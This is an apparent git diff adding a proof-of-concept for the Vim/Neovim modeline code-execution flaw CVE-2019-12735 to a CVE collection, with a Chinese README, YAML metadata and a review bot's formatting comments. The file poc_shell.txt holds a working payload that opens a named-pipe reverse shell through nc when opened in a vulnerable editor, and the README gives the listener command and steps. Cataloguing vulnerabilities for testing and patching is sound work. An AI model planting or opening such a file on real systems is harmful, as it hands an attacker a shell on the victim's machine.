diff --git a/cve/vim/2019/CVE-2019-12735/README.md b/cve/vim/2019/CVE-2019-12735/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..fc10ae4194e348d3379bc7ef5cb901db8f9a5043
--- /dev/null
+++ b/cve/vim/2019/CVE-2019-12735/README.md
@@ -0,0 +1,13 @@
+# Vim/Neovim通过Modelines执行任意代码
+Vim/Neovim Arbitrary Code Execution via Modelines (CVE-2019-12735)
+
+# 概念验证
+1. listen
+```
+nc -vlp 9999
+```
+2. 确保set modeline选项未被禁用。在 Vim 中打开文件
+```
+vim poc_shell.txt
+```
+之后系统将得到一个shell。
diff --git a/cve/vim/2019/CVE-2019-12735/poc_shell.txt b/cve/vim/2019/CVE-2019-12735/poc_shell.txt
new file mode 100644
index 0000000000000000000000000000000000000000..ffc36b5a5e8acf75d624f8cac4d42ab6d24e0662
--- /dev/null
+++ b/cve/vim/2019/CVE-2019-12735/poc_shell.txt
@@ -0,0 +1 @@
+:!rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 9999 >/tmp/f||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
diff --git a/cve/vim/2019/CVE-2019-12735/poc_uname.txt b/cve/vim/2019/CVE-2019-12735/poc_uname.txt
new file mode 100644
index 0000000000000000000000000000000000000000..2cf5405f30bad495c8ecc5a42bb9e2eae192462f
--- /dev/null
+++ b/cve/vim/2019/CVE-2019-12735/poc_uname.txt
@@ -0,0 +1 @@
+:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
diff --git a/cve/vim/2019/yaml/CVE-2019-12735.yaml b/cve/vim/2019/yaml/CVE-2019-12735.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..a40bdd8a74bbc85e569f60c24c2bdf064df4e985
--- /dev/null
+++ b/cve/vim/2019/yaml/CVE-2019-12735.yaml
@@ -0,0 +1,22 @@
+id: CVE-2019-12735
+source: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
+info:
+ name: Vim是一款跨平台的文本编辑器。
+ severity: high
+ description: |
+ 该漏洞存在于编辑器的 modeline功能,部分 Linux 发行版默认启用了该功能,macOS 是没有默认启用。据发现,`:source!`命令不受sandbox的限制。如果明确启用Modeline,那么在VIM中打开巧尽心思构建的文本文件,可能导致任意命令执行。
+ scope-of-influence:
+ Vim < 8.1.1365
+ Neovim < 0.3.6
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12735
+ - https://access.redhat.com/errata/RHSA-2019:1619
+ - http://www.securityfocus.com/bid/108724
+ classification:
+ cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+ cvss-score: 8.6
+ cve-id: CVE-2019-12735
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
+ tags: OS Command Injection, cve2019
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367b6465e9d0e9c24f102c47dfafcf732cc..f418b9e500b7e4ad25182d938f56a7aa67904bc0 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -60,6 +60,7 @@ cve:
 polkit:
 - CVE-2021-4034
 vim:
+ - CVE-2019-12735
 - CVE-2021-3778
 - CVE-2022-0351
 - CVE-2022-0359
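Review bot: `scope-of-influence` in the CVE-2019-12735.yaml hunk appears to be a plain multi-line scalar, so a YAML loader folds its two lines into the single string `Vim < 8.1.1365 Neovim < 0.3.6` and the version boundary between the two products is lost; the sibling `reference` field already uses a sequence, so write it the same way, `scope-of-influence:` followed by `- Vim < 8.1.1365` and `- Neovim < 0.3.6`. `info.name` holds a one-sentence product description (`Vim是一款跨平台的文本编辑器。`) rather than a title for the entry; the README's English heading, `Vim/Neovim Arbitrary Code Execution via Modelines`, would fit better here, and the sentence belongs in `description`. `cnvd-id: None` and `kve-id: None` parse as the literal string `None`, not as a null, so a consumer testing for an absent identifier will see a value; use `null` (or `~`) if absence is what is meant. The file also lacks a trailing newline, and `巧尽心思构建` in the description reads as a typo for `精心构建`.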